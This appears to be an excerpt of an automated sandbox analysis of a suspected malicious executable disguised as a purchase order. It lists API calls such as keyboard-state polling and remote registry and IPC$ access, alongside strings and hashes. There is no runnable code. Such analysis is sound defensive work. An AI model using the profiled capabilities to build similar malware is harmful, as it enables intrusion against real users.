                                                                            • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                            • _wcslen.LIBCMT ref: 004610A3
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                            • GetWindowRect.USER32(?,?), ref: 00461248
                                                                              • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                            • String ID: ThumbnailClass
                                                                            • API String ID: 4136854206-1241985126
                                                                            • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                            • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                            • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                            • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                            APIs
                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                            • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                            • String ID: 2
                                                                            • API String ID: 1331449709-450215437
                                                                            • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                            • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                            • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                            • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                            • __swprintf.LIBCMT ref: 00460915
                                                                            • __swprintf.LIBCMT ref: 0046092D
                                                                            • _wprintf.LIBCMT ref: 004609E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                            • API String ID: 3054410614-2561132961
                                                                            • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                            • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                            • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                            • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                            APIs
                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                            • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                            • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 600699880-22481851
                                                                            • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                            • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                            • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                            • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyWindow
                                                                            • String ID: static
                                                                            • API String ID: 3375834691-2160076837
                                                                            • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                            • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                            • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                            • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                            • API String ID: 2907320926-3566645568
                                                                            • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                            • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                            • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                            • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                            APIs
                                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                            • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                            • DeleteObject.GDI32(00630053), ref: 00470A04
                                                                            • DestroyIcon.USER32(00690072), ref: 00470A1C
                                                                            • DeleteObject.GDI32(00000001), ref: 00470A34
                                                                            • DestroyWindow.USER32(004F0046), ref: 00470A4C
                                                                            • DestroyIcon.USER32(?), ref: 00470A73
                                                                            • DestroyIcon.USER32(?), ref: 00470A81
                                                                            • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 1237572874-0
                                                                            • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                            • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                            • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                            • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                            • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                            • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                            • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                            • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                            • VariantClear.OLEAUT32(?), ref: 00479489
                                                                            • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                            • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                            • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                            • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                            • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 0044480E
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                            • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                            • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                            • GetKeyState.USER32(00000011), ref: 00444903
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                            • GetKeyState.USER32(00000012), ref: 0044492D
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                            • GetKeyState.USER32(0000005B), ref: 00444958
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                            • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                            • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                            • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3413494760-0
                                                                            • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                            • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                            • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                            • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _strncmp
                                                                            • String ID: '$DEFINE$\$`$h$h
                                                                            • API String ID: 909875538-3708680428
                                                                            • Opcode ID: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                                            • Instruction ID: 816ce89e9d314c50cae2ff635e2dae77420ade2a81b985ada7b38a9c48760da0
                                                                            • Opcode Fuzzy Hash: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                                            • Instruction Fuzzy Hash: C502B470A042498FEF14CF69C9906AEBBF2FF85304F2481AED8459B341D7399946CB55
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                            • String ID: AU3_FreeVar
                                                                            • API String ID: 2634073740-771828931
                                                                            • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                            • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                            • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                            • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                            APIs
                                                                            • CoInitialize.OLE32 ref: 0046C63A
                                                                            • CoUninitialize.OLE32 ref: 0046C645
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                              • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                              • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                            • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 2294789929-1287834457
                                                                            • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                            • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                            • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                            • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                            APIs
                                                                              • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                              • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                            • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                            • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                            • ReleaseCapture.USER32 ref: 0047116F
